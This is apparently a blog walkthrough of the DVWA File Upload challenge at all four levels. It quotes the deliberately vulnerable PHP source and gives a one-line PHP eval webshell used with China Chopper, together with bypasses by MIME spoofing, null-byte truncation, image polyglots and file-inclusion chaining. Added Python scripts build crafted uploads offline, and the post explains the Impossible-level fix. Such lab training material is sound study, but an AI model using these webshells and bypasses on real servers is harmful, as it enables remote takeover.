DVWA -- File Upload, all levels

File Upload: a file upload vulnerability is among the most damaging web bugs, because a successful exploit usually yields a shell on the server directly ("getshell"). The root cause is simple: the application lets a user upload a file that the web server will later parse and execute as a script, either because the upload is not validated at all or because the developers' or operators' checks can be bypassed. Apache, Tomcat and Nginx have all had parsing quirks that turn an uploaded file into executable code.

Successful exploitation needs at least three conditions:

A. a working upload point;
B. the uploaded file is parsed and executed by the server;
C. the uploaded file can be reached (its path is known and accessible).

Low

Source:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    // Nothing about the name, declared type or content is checked:
    // whatever the client sends is written under hackable/uploads/.
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        $html .= '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

Looking at the source, the server checks neither the type nor the content of the uploaded file. It builds the target path from the client-supplied name, calls move_uploaded_file, and reports success or failure; there is nothing to bypass, so file upload here is as easy as it gets. One note on basename(path, suffix): it returns the file-name component of path; if the optional suffix argument is given and matches the end of the name, that suffix is removed, otherwise the extension is kept. Here it is called without a suffix, so only the directory part of a crafted name is stripped. That stops path traversal through the file name, and nothing else.

Next we upload an executable file to a known path, a one-line PHP Trojan, and then work on the server through it.

We start by writing the one-line Trojan into a new file, muma.txt. (For the server to execute it, the file must be stored with a .php extension; at Low it is saved under whatever name we give it.)

After the file is uploaded:

Once the upload succeeds we use China Chopper (中国菜刀) to get a webshell: open the tool, enter the URL of the uploaded file as the address, and enter as the password the parameter name used in the one-liner (here gxy). Chopper then sends POST requests to that URL carrying the gxy parameter, whose value is PHP code the server evaluates, so we can run arbitrary commands and manage files on the server at will.
Medium

Source:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    // 'type' is the Content-Type the client put in the multipart part,
    // not anything the server determined from the file itself.
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

The Medium-level code restricts the uploaded file's type and size: the MIME type must be image/jpeg or image/png and the size must be below 100000 bytes (about 97.6 KB). Note that $_FILES['uploaded']['type'] is the Content-Type the client declared in the multipart request, so it is entirely under the attacker's control; the file name and content are still not examined at all.

This makes things slightly more annoying.

We came up with three methods (plus a fourth variant at the end):

Method One: file upload + file inclusion

Write the Trojan as before, but give it a png extension: muma.png

Once uploaded, the page reports success.

Now open China Chopper and add the address and password. The upload URL itself is no use here: Chopper works by POSTing parameters to the uploaded file and having the server run different commands according to them, but the server serves muma.png as an image, so a POST to it just returns the "picture" bytes and executes nothing. We therefore chain in the Medium-level file inclusion vulnerability: in Chopper, click Add, enter http://192.168.24.140/vulnerabilities/fi/?page=hthttp://tp://192.168.24.140/hackable/uploads/muma.png as the address, choose PHP as the script language, and the connection succeeds. The hthttp://tp:// spelling is there because DVWA's Medium file-inclusion filter removes the literal string http:// in a single non-recursive pass, which collapses it back to http://.
Method Two: intercept the request and change the file name

Upload muma.png and intercept the request with a proxy such as Burp Suite:

The file part carries Content-Type: image/png. Change the filename to muma.php, leave the Content-Type alone, and click Forward:

The server reports a successful upload, because it only looked at the declared MIME type. muma.php now sits in hackable/uploads/, and China Chopper connects to it directly.
Method Three: null-byte truncation

Name the file muma.php%00.png and upload it. The check is satisfied (the declared type is still image/png), but when the name reaches the file system the null byte terminates the string, so what is actually written is muma.php. Then connect with China Chopper as before.

Caveat: this only works on old PHP (before 5.3.4), which truncated file-system paths at a NUL byte; current versions reject paths containing NUL, so on an up-to-date DVWA install the upload simply fails.
Method Four: the same truncation done in the proxy's hex editor

Name the Trojan muma.php.jpeg, upload it and intercept the request. In the hex view of the request, change the 2e byte (the '.' before jpeg) to 00:

The stored file is then muma.php (subject to the same PHP-version caveat as Method Three).

We check the uploaded file, and then it is China Chopper's turn.
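The Medium bypasses in Methods Two, Three and Four all rest on one fact: the server copies name and type straight out of the multipart request. The following Python script is an added example, not code from this post or from DVWA. It builds the multipart body the upload form sends, parses it back the way PHP populates $_FILES, and runs the crafted variants through a model of the Medium check. The boundary string, the body of the one-liner and the helper names are assumptions (only the gxy parameter name comes from the post), and nothing is sent over the network.

```python
import re

# Fixed boundary so the bytes are reproducible (a browser picks a random one).
BOUNDARY = "----DVWAdemoBoundary7f3a1c"

# One-line Trojan connected to with China Chopper. 'gxy' is the POST parameter
# ("password") named in the post; the code itself is an assumption.
PHP_ONELINER = b"<?php @eval($_POST['gxy']); ?>"


def build_upload(filename: str, content_type: str, data: bytes,
                 boundary: str = BOUNDARY) -> bytes:
    """Build the multipart/form-data body DVWA's upload form sends.

    filename and content_type are whatever the client chooses to claim; this
    is exactly the text an intercepting proxy lets you edit before Forward.
    """
    b = boundary.encode("ascii")
    parts = [
        b"--" + b,
        b'Content-Disposition: form-data; name="MAX_FILE_SIZE"',
        b"",
        b"100000",
        b"--" + b,
        b'Content-Disposition: form-data; name="uploaded"; filename="'
        + filename.encode("latin-1") + b'"',
        b"Content-Type: " + content_type.encode("ascii"),
        b"",
        data,
        b"--" + b,
        b'Content-Disposition: form-data; name="Upload"',
        b"",
        b"Upload",
        b"--" + b + b"--",
        b"",
    ]
    return b"\r\n".join(parts)


def parse_upload(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Rebuild what PHP exposes as $_FILES['uploaded'] from the raw body.

    Like PHP, 'name' and 'type' are copied verbatim from the client's
    Content-Disposition filename and the part's Content-Type; nothing is sniffed.
    """
    delim = b"--" + boundary.encode("ascii")
    for part in body.split(delim):
        head, sep, content = part.partition(b"\r\n\r\n")
        if not sep or b'name="uploaded"' not in head:
            continue
        content = content[:-2]                       # CRLF before next delimiter
        name = re.search(rb'filename="([^"]*)"', head).group(1).decode("latin-1")
        m = re.search(rb"Content-Type:\s*([^\r\n]+)", head)
        return {"name": name,
                "type": m.group(1).decode("ascii") if m else "",
                "size": len(content),
                "tmp": content}
    raise ValueError('no "uploaded" part in body')


def medium_accepts(upload: dict) -> bool:
    """DVWA Medium: only the client-declared MIME type and the size are checked."""
    return upload["type"] in ("image/jpeg", "image/png") and upload["size"] < 100000


def stored_name(upload: dict) -> str:
    """Where the file lands under hackable/uploads/: basename() of the client's
    name (slashes, and on the post's Windows host also backslashes, are dropped)."""
    return re.split(r"[\\/]", upload["name"])[-1]


def legacy_php_path(name: str) -> str:
    """Effect of the %00 trick on PHP < 5.3.4: the C string ends at the first NUL,
    so muma.php\\x00.png was written as muma.php. Current PHP refuses paths
    that contain a NUL byte, so on a modern install the upload just fails."""
    return name.split("\x00", 1)[0]


def demo() -> dict:
    """Three client-side variants from the post, run through the Medium check."""
    cases = {
        "honest":       ("muma.php", "application/x-php"),
        "method two":   ("muma.php", "image/png"),          # rename, keep MIME
        "method three": ("muma.php\x00.png", "image/png"),  # %00 in the name
    }
    out = {}
    for label, (fname, ctype) in cases.items():
        up = parse_upload(build_upload(fname, ctype, PHP_ONELINER))
        out[label] = (medium_accepts(up), legacy_php_path(stored_name(up)))
    return out


if __name__ == "__main__":
    for label, (ok, path) in demo().items():
        print(f"{label:13} accepted={ok!s:5} stored_as={path!r}")
```

The point to take from parse_upload is that a server-side "type" check against $_FILES['...']['type'] is a check against a string the attacker typed; the only reliable signals are ones the server derives itself from the bytes it received.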
High

Source:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    // getimagesize() only inspects the image header; the rest of the file is not examined.
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

strrpos(string, find, start)

Returns the position of the last occurrence of find in string, or false if it is not found; the optional start sets where the search begins.

substr(string, start, length)

Returns the part of string beginning at offset start; the optional length limits how many characters are returned.

getimagesize(string filename)

Reads the file header and returns the image's width, height, type and related information; if the file does not begin with a recognisable image header the function returns false.

So the High-level code takes everything after the last '.' in the file name as the extension and requires it to be jpg, jpeg or png: the uploaded name must have the form *.jpg, *.jpeg or *.png. In addition getimagesize() requires the file to start with a valid image header. Neither check looks at the rest of the file, and the name check means a .php file cannot be written directly, so the plan is to upload a file that is simultaneously a plausible image and PHP code, then get it executed through file inclusion.

1. We need the file to look like an image from its header. On the Windows command line, concatenate a normal image 1.jpg with the one-line Trojan 2.php, the binary image first and the text payload after it:

copy 1.jpg /b + 2.php /a 3.jpg

2. Alternatively, prepend the GIF signature GIF89a to the PHP file and give it a .jpg extension; getimagesize() only looks at the first bytes and does not compare the detected type with the extension. Then include it through the file inclusion page: http://127.0.0.1/vulnerabilities/fi/?page=file:///D:/PhpStudy/PHPTutorial/WWW/hackable/uploads/1.jpg

Opening the picture in an editor shows the one-line Trojan written at the very end:

We upload the resulting image Trojan, hack.jpg, and the upload succeeds.

Then connect with China Chopper through the file-inclusion URL, as in Method One.

Impossible

Source:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>
ini_get(varname)

Returns the value of the named configuration option.

imagecreatefromjpeg(filename)

Returns an image resource decoded from the JPEG file, or false on failure.

imagejpeg(image, filename, quality)

Writes the image to filename as a JPEG; the optional quality ranges from 0 (worst quality, smallest file) to 100 (best quality, largest file).

imagedestroy(img)

Frees the image resource.

The Impossible-level code renames the uploaded file to an md5 hash (keeping only the checked extension, so name tricks such as %00 truncation no longer control where the file lands), adds an Anti-CSRF token, requires the extension, the declared MIME type and the image header to agree, and above all re-encodes the image with GD before moving it into the web root. Re-encoding keeps only the decoded pixel data, so PHP appended to or tucked into the metadata of an image is discarded, and an attacker cannot get a file containing their script onto the server. Re-encoding is a strong mitigation rather than an absolute one: payloads crafted to survive GD re-encoding inside the pixel data have been demonstrated, which is why storing uploads outside the web root and never letting the server execute them remains the real fix.
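To make concrete both the High bypass (a file that is an image by its header but PHP by its tail) and why Impossible's re-encode defeats it, here is an added Python example; it is not code from the post or from DVWA. It builds a tiny PNG in place of the post's real 1.jpg, produces the two polyglots from the High section, runs them through a model of the High validation (extension after the last dot, size, header sniff in the spirit of getimagesize()), and then re-encodes the PNG the way Impossible's imagecreatefrompng()/imagepng() pair effectively does, by parsing the chunk stream and rewriting only the pixel data. The image builder, the header sniffer and the re-encoder are simplified stand-ins, which is an assumption, as is the body of the one-liner.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# One-line Trojan; the 'gxy' parameter name comes from the post, the code is assumed.
PHP_ONELINER = b"<?php @eval($_POST['gxy']); ?>"


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width: int = 2, height: int = 2) -> bytes:
    """Constructed stand-in for the real image (1.jpg) in the post: a minimal
    valid 8-bit RGB PNG with every pixel black."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    return (PNG_SIG + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", zlib.compress(scanlines))
            + _png_chunk(b"IEND", b""))


def append_payload(image: bytes, payload: bytes) -> bytes:
    """Same result as `copy 1.jpg /b + 2.php /a 3.jpg`: image bytes, then PHP."""
    return image + payload


def gif_header_polyglot(payload: bytes) -> bytes:
    """Second trick from the post: only the six-byte GIF89a signature, then PHP."""
    return b"GIF89a" + payload


def sniff_image_type(data: bytes):
    """What getimagesize() effectively decides from: the first few bytes only."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return None


def high_accepts(filename: str, data: bytes, max_size: int = 100000) -> bool:
    """Model of DVWA High: extension after the last '.', size limit, image header.
    The extension is never compared with the sniffed type, so a GIF-headed .jpg
    passes, and the bytes after the header are never looked at."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return (ext in ("jpg", "jpeg", "png")
            and len(data) < max_size
            and sniff_image_type(data) is not None)


def reencode_png(data: bytes) -> bytes:
    """What Impossible's imagecreatefrompng() + imagepng() amounts to here: walk
    the chunk stream, keep IHDR and the pixel data, and write a fresh file.
    Reading stops at IEND, so anything appended after it (the PHP one-liner)
    never reaches the output."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, ihdr, idat = len(PNG_SIG), None, b""
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        pos += 12 + length                      # length + type + data + crc
        if ctype == b"IHDR":
            ihdr = body
        elif ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
    if ihdr is None or not idat:
        raise ValueError("truncated PNG")
    pixels = zlib.decompress(idat)              # decode the pixel data ...
    return (PNG_SIG + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", zlib.compress(pixels, 9))   # ... and re-encode it
            + _png_chunk(b"IEND", b""))


def demo() -> dict:
    """Run the post's candidate uploads through High, then through a re-encode."""
    copy_b = append_payload(make_png(), PHP_ONELINER)
    gif = gif_header_polyglot(PHP_ONELINER)
    return {
        "muma.php, plain PHP":        high_accepts("muma.php", PHP_ONELINER),
        "hack.jpg, plain PHP":        high_accepts("hack.jpg", PHP_ONELINER),
        "hack.jpg, copy /b":          high_accepts("hack.jpg", copy_b),
        "hack.jpg, GIF89a header":    high_accepts("hack.jpg", gif),
        "payload survives High":      PHP_ONELINER in copy_b,
        "payload survives re-encode": PHP_ONELINER in reencode_png(copy_b),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label:28} {value}")
```

The same header-only sniff that lets the polyglots through High is what the Impossible code still relies on for its getimagesize() call; the difference is that Impossible never writes the uploaded bytes to the web root at all, only the pixels it decoded from them.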

Origin www.cnblogs.com/li2019/p/12623431.html